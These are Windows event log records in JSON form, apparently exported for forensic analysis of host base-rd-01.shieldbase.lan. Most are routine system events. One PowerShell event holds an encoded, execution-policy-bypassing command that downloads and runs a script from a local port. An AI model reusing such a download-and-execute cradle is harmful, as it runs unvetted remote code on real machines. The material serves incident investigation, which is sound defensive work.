\"},{\"@Name\":\"AuthenticationPackageName\",\"#text\":\"Negotiate\"},{\"@Name\":\"WorkstationName\",\"#text\":\"-\"},{\"@Name\":\"LogonGuid\",\"#text\":\"00000000-0000-0000-0000-000000000000\"},{\"@Name\":\"TransmittedServices\",\"#text\":\"-\"},{\"@Name\":\"LmPackageName\",\"#text\":\"-\"},{\"@Name\":\"KeyLength\",\"#text\":\"0\"},{\"@Name\":\"ProcessId\",\"#text\":\"0x2E4\"},{\"@Name\":\"ProcessName\",\"#text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"@Name\":\"IpAddress\",\"#text\":\"-\"},{\"@Name\":\"IpPort\",\"#text\":\"-\"},{\"@Name\":\"ImpersonationLevel\",\"#text\":\"%%1833\"},{\"@Name\":\"RestrictedAdminMode\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundUserName\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundDomainName\",\"#text\":\"-\"},{\"@Name\":\"VirtualAccount\",\"#text\":\"%%1843\"},{\"@Name\":\"TargetLinkedLogonId\",\"#text\":\"0x0\"},{\"@Name\":\"ElevatedToken\",\"#text\":\"%%1842\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4624,"EventRecordId":"53901","ProcessId":772,"ThreadId":3856,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-09-04T09:30:44.5912791+00:00","RecordNumber":53901}
{"ChunkNumber":55,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"5797","ProcessId":624,"ThreadId":3116,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-09T22:03:30.0393026+00:00","RecordNumber":5797}
{"ChunkNumber":149,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"[0f10] [000001FDF21247D0:53466E60-4DA9-D32B-D0C1-E0686457D28F] StartProcessing: Key:Valid\"},{\"@Name\":\"Function\",\"#text\":\"StateMachine<class KeyMachine,class KeyState>::PumpEvents\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\statemachine.h\"},{\"@Name\":\"Line Number\",\"#text\":\"154\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"266509","ProcessId":692,"ThreadId":3856,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-05T11:53:54.4978181+00:00","RecordNumber":266509}
{"ChunkNumber":9,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"hrError\",\"#text\":\"0x80070002\"},{\"@Name\":\"FolderId\",\"#text\":\"c5abbf53-e17f-4121-8900-86626fc2c973\"},{\"@Name\":\"Path\",\"#text\":\"C:\\\\WINDOWS\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Network Shortcuts\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Known Folders API Service","Provider":"Microsoft-Windows-KnownFolders","EventId":1002,"EventRecordId":"19725","ProcessId":1484,"ThreadId":2408,"Level":3,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Known Folders API Service.evtx","TimeCreated":"2018-08-22T22:33:55.1176320+00:00","RecordNumber":19725}
{"ChunkNumber":10,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":\"\"}","UserId":"S-1-5-18","Channel":"Microsoft-Client-Licensing-Platform/Admin","Provider":"Microsoft-Client-Licensing-Platform","EventId":102,"EventRecordId":"8973","ProcessId":6096,"ThreadId":752,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx","TimeCreated":"2018-08-30T21:44:02.4714107+00:00","RecordNumber":8973}
{"ChunkNumber":53,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"DescriptionString\",\"#text\":\"Local Group Policy, Not Applied (Empty), \"},{\"@Name\":\"GPOInfoList\",\"#text\":\"<GPO ID=\\\"Local Group Policy\\\"><Name>Local Group Policy</Name><Version>0</Version><SOM>Local</SOM><FSPath>C:\\\\WINDOWS\\\\System32\\\\GroupPolicy\\\\Machine</FSPath><Reason>NOTAPPLIED-EMPTY</Reason></GPO>\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-GroupPolicy/Operational","Provider":"Microsoft-Windows-GroupPolicy","EventId":5313,"EventRecordId":"153527","ProcessId":556,"ThreadId":10692,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx","TimeCreated":"2018-09-04T01:10:52.2011896+00:00","RecordNumber":153527}
{"ChunkNumber":3,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Operation\",\"#text\":\"Service started\"},{\"@Name\":\"Details\",\"#text\":\"The service will auto stop if no requests received for some period of time.\"},{\"@Name\":\"Status\",\"#text\":\"0x0\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-LiveId/Operational","Provider":"Microsoft-Windows-LiveId","EventId":2024,"EventRecordId":"43354","ProcessId":648,"ThreadId":2552,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-LiveId%4Operational.evtx","TimeCreated":"2018-09-06T20:36:06.0734995+00:00","RecordNumber":43354}
{"ChunkNumber":0,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"DeviceGUID\",\"#text\":\"7e1622a0-5739-11e8-a8fc-806e6f6e6963\"},{\"@Name\":\"DeviceNumber\",\"#text\":\"0\"},{\"@Name\":\"Vendor\",\"#text\":\"VMware  \"},{\"@Name\":\"Model\",\"#text\":\"Virtual disk    \"},{\"@Name\":\"FirmwareVersion\",\"#text\":\"1.0 \"},{\"@Name\":\"SerialNumber\",\"#text\":\"NULL\"},{\"@Name\":\"IrpStatus\",\"#text\":\"0xC0000185\"},{\"@Name\":\"IoctlControlCode\",\"#text\":\"0x74080\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Storage-ClassPnP/Operational","Provider":"Microsoft-Windows-StorDiag","EventId":504,"EventRecordId":"66","ProcessId":2676,"ThreadId":4252,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Storage-ClassPnP%4Operational.evtx","TimeCreated":"2018-05-18T05:00:30.1338054+00:00","RecordNumber":66}
{"ChunkNumber":0,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"Prop_ContainerId\",\"#text\":\"{ECC1E499-5EFD-039D-5887-23C2BD87E9A7}\"}}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-DeviceSetupManager/Operational","Provider":"Microsoft-Windows-DeviceSetupManager","EventId":300,"EventRecordId":"73","ProcessId":8,"ThreadId":10868,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx","TimeCreated":"2018-07-11T05:42:41.7985704+00:00","RecordNumber":73}
{"ChunkNumber":108,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.522, 8024000b, B56983B9-0E9A-43CF-91CE-82AB93868152, Download, 1, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WER2DD6.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.522_bfa851ad863780604d24cc9be2e5d0295a61fcd_00000000_776ac6be, 0, 80fa3bbe-ece4-4c1c-892e-b0559b6a164d, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"254584","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-03T03:32:07.1039462+00:00","RecordNumber":254584}
{"ChunkNumber":4,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"FailureTime\",\"#text\":\"2018-08-06 19:28:45.3116586\"},{\"@Name\":\"StackHash\",\"#text\":\"0xF73EBCEB\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational","Provider":"Microsoft-Windows-Security-LessPrivilegedAppContainer","EventId":1,"EventRecordId":"615","ProcessId":3596,"ThreadId":5040,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Security-LessPrivilegedAppContainer%4Operational.evtx","TimeCreated":"2018-08-06T19:28:45.3116596+00:00","RecordNumber":615}
{"ChunkNumber":4,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"ProcessName\"},{\"@Name\":\"Type\",\"#text\":\"1\"},{\"@Name\":\"ErrorCode\",\"#text\":\"2147942403\"},{\"@Name\":\"File\",\"#text\":\"onecoreuap\\\\shell\\\\cloudstore\\\\store\\\\cache\\\\src\\\\cloudcacheinitializer.cpp\"},{\"@Name\":\"LineNumber\",\"#text\":\"178\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-CloudStore/Operational","Provider":"Microsoft-Windows-CloudStore","EventId":1,"EventRecordId":"2746","ProcessId":1484,"ThreadId":1580,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-CloudStore%4Operational.evtx","TimeCreated":"2018-08-14T18:39:37.9507761+00:00","RecordNumber":2746}
{"ChunkNumber":4,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"DeviceGUID\",\"#text\":\"bc74567b-99ad-11e8-a901-806e6f6e6963\"},{\"@Name\":\"DeviceNumber\",\"#text\":\"0\"},{\"@Name\":\"Vendor\",\"#text\":\"VMware  \"},{\"@Name\":\"Model\",\"#text\":\"Virtual disk    \"},{\"@Name\":\"FirmwareVersion\",\"#text\":\"1.0 \"},{\"@Name\":\"SerialNumber\",\"#text\":\"NULL\"},{\"@Name\":\"IrpStatus\",\"#text\":\"0xC0000185\"},{\"@Name\":\"IoctlControlCode\",\"#text\":\"0x74080\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Storage-ClassPnP/Operational","Provider":"Microsoft-Windows-StorDiag","EventId":504,"EventRecordId":"649","ProcessId":3048,"ThreadId":356,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Storage-ClassPnP%4Operational.evtx","TimeCreated":"2018-08-14T03:30:06.6573701+00:00","RecordNumber":649}
{"ChunkNumber":75,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"CreatedTaskProcess\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\sih\"},{\"@Name\":\"Path\",\"#text\":\"%systemroot%\\\\System32\\\\sihclient.exe\"},{\"@Name\":\"ProcessID\",\"#text\":\"10504\"},{\"@Name\":\"Priority\",\"#text\":\"16384\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":129,"EventRecordId":"190212","ProcessId":1484,"ThreadId":1580,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-24T18:01:41.1531519+00:00","RecordNumber":190212}
{"ChunkNumber":59,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"ContentId: DFBE09D0-1F22-A9C0-2D3D-3F4C6351E58F, cached FulfillmentData: {\\\"ProductId\\\":\\\"9WZDNCRD1HKW\\\",\\\"SkuId\\\":\\\"0010\\\",\\\"PackageFamilyName\\\":\\\"Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\\",\\\"WuCategoryId\\\":\\\"9db724c9-966d-4aeb-9d3b-d6b2c77f3de3\\\"}\"},{\"@Name\":\"Function\",\"#text\":\"GetFulfillmentData\"},{\"@Name\":\"Error Code\",\"#text\":\"-1\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\installservice\\\\lib\\\\storeappinfo.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"445\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Install-Agent","EventId":2002,"EventRecordId":"258079","ProcessId":9104,"ThreadId":10792,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-04T03:01:28.2608929+00:00","RecordNumber":258079}
{"PayloadData1":"HostApplication=powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQA6ADQAMQA2ADEANAAvACcAKQApAA==","PayloadData2":"HostName=ConsoleHost","PayloadData3":"HostVersion=5.1.16299.547","MapDescription":"Engine state is changed from Available to Stopped.","ChunkNumber":504,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"Stopped, Available, \\tNewEngineState=Stopped\\n\\tPreviousEngineState=Available\\n\\n\\tSequenceNumber=31\\n\\n\\tHostName=ConsoleHost\\n\\tHostVersion=5.1.16299.547\\n\\tHostId=0e07f97e-96aa-4a3b-8f59-34b49b201104\\n\\tHostApplication=powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQA6ADQAMQA2ADEANAAvACcAKQApAA==\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=db7d2211-c023-49c2-8021-379649a9cfd2\\n\\tPipelineId=\\n\\tCommandName=\\n\\tCommandType=\\n\\tScriptName=\\n\\tCommandPath=\\n\\tCommandLine=\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":403,"EventRecordId":"10622","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-31T00:06:58.8615796+00:00","RecordNumber":10622}
{"ChunkNumber":0,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"InterfaceGuid\",\"#text\":\"c0b83799-cd6d-4ea6-8e37-5afba29408dc\"},{\"@Name\":\"MediaType\",\"#text\":\"1\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Wcmsvc/Operational","Provider":"Microsoft-Windows-Wcmsvc","EventId":1010,"EventRecordId":"146","ProcessId":1668,"ThreadId":3060,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx","TimeCreated":"2018-05-11T17:12:44.9090717+00:00","RecordNumber":146}
{"ChunkNumber":17,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"2031","ProcessId":628,"ThreadId":672,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-08T15:36:15.2098498+00:00","RecordNumber":2031}
{"PayloadData1":"PID: 8376","PayloadData2":"Path: C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","MapDescription":"WMI wmiprvse execution","ChunkNumber":98,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"UserData\":{\"Operation_StartedOperational\":{\"ProviderName\":\"WmiPerfInst\",\"Code\":\"0x0\",\"HostProcess\":\"wmiprvse.exe\",\"ProcessID\":\"8376\",\"ProviderPath\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPerfInst.dll\"}}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-WMI-Activity/Operational","Provider":"Microsoft-Windows-WMI-Activity","EventId":5857,"EventRecordId":"15801","ProcessId":8376,"ThreadId":4672,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx","TimeCreated":"2018-09-05T15:14:22.3058766+00:00","RecordNumber":15801}
{"ChunkNumber":9,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"User\",\"#text\":\"spsql\"},{\"@Name\":\"TaskId\",\"#text\":\"install::E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\"},{\"@Name\":\"TaskCount\",\"#text\":\"7\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-AppReadiness/Admin","Provider":"Microsoft-Windows-AppReadiness","EventId":240,"EventRecordId":"1186","ProcessId":372,"ThreadId":15696,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-AppReadiness%4Admin.evtx","TimeCreated":"2018-08-28T21:39:22.1235156+00:00","RecordNumber":1186}
{"ChunkNumber":127,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"State Machine\",\"#text\":\"0x1FDF2123830\"},{\"@Name\":\"Thread ID\",\"#text\":\"4028\"},{\"@Name\":\"State Machine Name\",\"#text\":\"Key:Valid\"},{\"@Name\":\"Current State\",\"#text\":\"Key:Invalid\"},{\"@Name\":\"New State\",\"#text\":\"0116DC02-781B-D1D1-FC1C-C80195511E17\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8012,"EventRecordId":"264437","ProcessId":692,"ThreadId":4028,"Level":5,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-05T04:02:00.6044856+00:00","RecordNumber":264437}
{"ChunkNumber":2,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"ConnectionType\",\"#text\":\"0\"},{\"@Name\":\"HostName\",\"#text\":\"172.16.4.10\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-PushNotification-Platform/Operational","Provider":"Microsoft-Windows-PushNotifications-Platform","EventId":1214,"EventRecordId":"177530","ProcessId":648,"ThreadId":2524,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-PushNotification-Platform%4Operational.evtx","TimeCreated":"2018-09-07T01:39:28.3634371+00:00","RecordNumber":177530}
{"ChunkNumber":251,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"TimeTriggerEvent\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\QueueReporting\"},{\"@Name\":\"InstanceId\",\"#text\":\"4d497709-8679-4f58-b83c-2a7bd22dbfcf\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":107,"EventRecordId":"209415","ProcessId":556,"ThreadId":9432,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-09-05T08:53:40.0466405+00:00","RecordNumber":209415}
{"PayloadData1":"Target: shieldbase\\tdungan","MapDescription":"The workstation was locked","ChunkNumber":509,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"TargetUserSid\",\"#text\":\"S-1-5-21-3445421715-2530590580-3149308974-1116\"},{\"@Name\":\"TargetUserName\",\"#text\":\"tdungan\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"TargetLogonId\",\"#text\":\"0x153003\"},{\"@Name\":\"SessionId\",\"#text\":\"1\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4800,"EventRecordId":"46922","ProcessId":776,"ThreadId":824,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-30T04:17:27.8991239+00:00","RecordNumber":46922}
{"ChunkNumber":186,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"[15e4] [000001FDF2123510:0116DC02-781B-D1D1-FC1C-C80195511E17] Dispatch       : Key:Initial <- Key:Activate\"},{\"@Name\":\"Function\",\"#text\":\"StateMachine<class KeyMachine,class KeyState>::PumpEvents\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\statemachine.h\"},{\"@Name\":\"Line Number\",\"#text\":\"162\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"269984","ProcessId":692,"ThreadId":5604,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-05T22:30:44.5123724+00:00","RecordNumber":269984}
{"ChunkNumber":16,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"},{\"@Name\":\"resourceUri\",\"#text\":\"http://schemas.microsoft.com/wbem/wsman/1/SubscriptionManager/Subscription\"}]}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":145,"EventRecordId":"267882","ProcessId":1100,"ThreadId":1692,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-08-30T14:27:04.5570264+00:00","RecordNumber":267882}
{"ChunkNumber":5,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":\"\"}","UserId":"S-1-5-18","Channel":"Microsoft-Client-Licensing-Platform/Admin","Provider":"Microsoft-Client-Licensing-Platform","EventId":102,"EventRecordId":"10643","ProcessId":11872,"ThreadId":9636,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx","TimeCreated":"2018-09-05T12:34:53.2131727+00:00","RecordNumber":10643}
{"ChunkNumber":107,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.98, 80240437, 00000000-0000-0000-0000-000000000000, Scan, 0, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WERBE1C.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.98_d127d0c9d9253bdcb4e9f182ac69fab59f08c0_00000000_54446433, 0, 883c1649-88c7-496b-92d3-a966b76a78bb, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"254517","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-03T03:29:33.0449360+00:00","RecordNumber":254517}
{"ChunkNumber":107,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"CreatedTaskProcess\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\QueueReporting\"},{\"@Name\":\"Path\",\"#text\":\"%windir%\\\\system32\\\\wermgr.exe\"},{\"@Name\":\"ProcessID\",\"#text\":\"14532\"},{\"@Name\":\"Priority\",\"#text\":\"16384\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":129,"EventRecordId":"193717","ProcessId":1484,"ThreadId":3896,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-27T01:07:12.1239454+00:00","RecordNumber":193717}
{"ChunkNumber":20,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SupportInfo1\",\"#text\":\"1\"},{\"@Name\":\"SupportInfo2\",\"#text\":\"4220\"},{\"@Name\":\"ProcessingMode\",\"#text\":\"0\"},{\"@Name\":\"ProcessingTimeInMilliseconds\",\"#text\":\"1110\"},{\"@Name\":\"DCName\",\"#text\":\"\\\\\\\\base-dc.shieldbase.lan\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"System","Provider":"Microsoft-Windows-GroupPolicy","EventId":1501,"EventRecordId":"3190","ProcessId":8,"ThreadId":6072,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\System.evtx","TimeCreated":"2018-06-20T23:33:16.5893056+00:00","RecordNumber":3190}
{"ChunkNumber":320,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"TargetUserName\",\"#text\":\"Administrators\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"Builtin\"},{\"@Name\":\"TargetSid\",\"#text\":\"S-1-5-32-544\"},{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"CallerProcessId\",\"#text\":\"0x764\"},{\"@Name\":\"CallerProcessName\",\"#text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4799,"EventRecordId":"30264","ProcessId":744,"ThreadId":13956,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-06T17:51:27.5164000+00:00","RecordNumber":30264}
